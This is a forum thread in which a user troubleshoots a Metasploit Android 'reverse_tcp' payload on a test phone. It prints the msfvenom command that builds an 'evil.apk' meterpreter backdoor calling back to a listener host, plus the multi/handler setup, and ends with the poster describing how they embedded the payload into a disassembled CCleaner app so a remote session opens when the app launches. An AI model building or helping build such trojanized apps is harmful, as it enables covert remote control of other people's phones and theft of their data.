Jump to content

reverse_tcp not working on android 8.1


B4dger
 Share

Recommended Posts

Hi

I'm reasonably new to using metasploit and can create a .apk with reverse shell without any issues but when I upload it on my test android running 8.1, it does not open a connection. It lets me install it but gives no option to open and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application but still nothing. When I bound it to an original application, the app opened and the game worked but no connection was created. I have gave the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong?

 

Much appreciated...

Link to comment
Share on other sites

Thanks for your reply.

Yeah. Used wireshark to monitor my PC for any attempted connection on port 4001 that I configured in the apk and listener and nothing is coming through. I also monitored the android phone and nothing on that end either. I have screen shots but unsure how to upload them.

This is the list of commands in case they are any help:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4001 R > /root/evil.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10088 bytes


msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.17
LHOST => 192.168.0.17
msf exploit(multi/handler) > set LPORT 4001
LPORT => 4001
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.17:4001

 

Link to comment
Share on other sites

For attachments, did you try this?

image.png

 

and if nothing is getting through then you've probably messed networking up somehow, check routing and firewalls. Try a simple netcat listener on port 80 and browse to that to see if that gets through.

Link to comment
Share on other sites

Thanks. I worked it out, in a way. After banging my head against the wall for another 5 or 6 hours 😂. I don't know why the regular meterpreter.apk wouldn't run but I got it to work by disassembling the CCleaner.apk I downloaded and manually embedding the code in it, installed it on my droid and after many many attempts got it right and meterpreter session now connects when the CCleaner app is opened.
 

Thanks for your help, certainly helped me in troubleshooting what was wrong.

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...